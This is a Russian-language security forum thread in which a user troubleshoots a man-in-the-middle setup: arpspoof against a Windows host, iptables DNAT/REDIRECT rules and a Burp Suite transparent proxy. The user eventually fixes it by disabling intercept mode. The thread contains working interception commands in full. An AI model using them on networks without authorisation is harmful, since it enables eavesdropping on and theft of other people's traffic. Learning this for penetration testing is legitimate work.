• B правой части каждого сообщения есть стрелки и . Не стесняйтесь оценивать ответы. Чтобы автору вопроса закрыть свой тикет, надо выбрать лучший ответ. Просто нажмите значок в правой части сообщения.

  • Курсы Академии Кодебай, стартующие в мае - июне, от команды The Codeby

    1. Цифровая криминалистика и реагирование на инциденты
    2. ОС Linux (DFIR) Старт: 16 мая
    3. Анализ фишинговых атак Старт: 16 мая Устройства для тестирования на проникновение Старт: 16 мая

    Скидки до 10%

    Полный список ближайших курсов ...

burpSuite proxy+arpspoof - не работает полностью.

slava-r

Member
27.05.2020
7
0
BIT
0
Всем доброго времени суток
Настройки такие:

echo 1 > /proc/sys/net/ipv4/ip_forward
iptables -t nat -A PREROUTING -p tcp --dport 443 -j DNAT --to-destination 192.168.1.103
iptables -t nat -A PREROUTING -p tcp --dport 80 -j DNAT --to-destination 192.168.1.103

--arpspoof

arpspoof -i wlan0 -t 192.168.1.105 192.168.1.1

спуфинг работает, вижу это через tracert какой-нить_сайт на стороне windows.

в burpSuite настроил прозрачный прокси на 443 порту

на windows при попытке конекта на любой https'ный сайт появляется сообщение ERR_CERT_AUTHORITY_INVALID но ниже есть ссылка чтобы все таки перейти на сайт.
После нажатия на нее в burpSuite вижу попытки конекта - см скриншот, однако в итоге соединение уходит куда то в космос и сайт не открывается.
Как только убираю из iptables правило - сайт тут же начинает работать.

что то не так с правилами iptables которые я ставлю или что то еще не сделано?
 

Вложения

  • IMG_20220213_162609.jpg
    IMG_20220213_162609.jpg
    220,8 КБ · Просмотры: 197

slava-r

Member
27.05.2020
7
0
BIT
0
тут проблема даже не с сертифиактом - т.е. может причина не открытия HTTPS'ных сайтов как раз это, но дело в том что простые HTTP сайты тоже перестают работать как только я добавляю правила редиректа (немного поменял их) для iptables:

iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8888
iptables -t nat -A PREROUTING -p tcp --destination-port 443 -j REDIRECT --to-port 8888

# iptables -t nat -L 1 ⨯
Chain PREROUTING (policy ACCEPT)
target prot opt source destination
REDIRECT tcp -- anywhere anywhere tcp dpt:http redir ports 8888
REDIRECT tcp -- anywhere anywhere tcp dpt:https redir ports 8888

Chain INPUT (policy ACCEPT)
target prot opt source destination

Chain OUTPUT (policy ACCEPT)
target prot opt source destination

Chain POSTROUTING (policy ACCEPT)
target prot opt source destination

└─#
ну и как только я удаляю эти правила - сайты на машине с windows тут же начинают открываться.

как выглядят настройки прокси и вкладка HTTP history можно глянуть здесь

 

slava-r

Member
27.05.2020
7
0
BIT
0
нашел ответ : режим перехвата был включен и это мешало работе прозрачного прокси. Как только выключил - все заработало.
 
Мы в соцсетях:

Обучение наступательной кибербезопасности в игровой форме. Начать игру!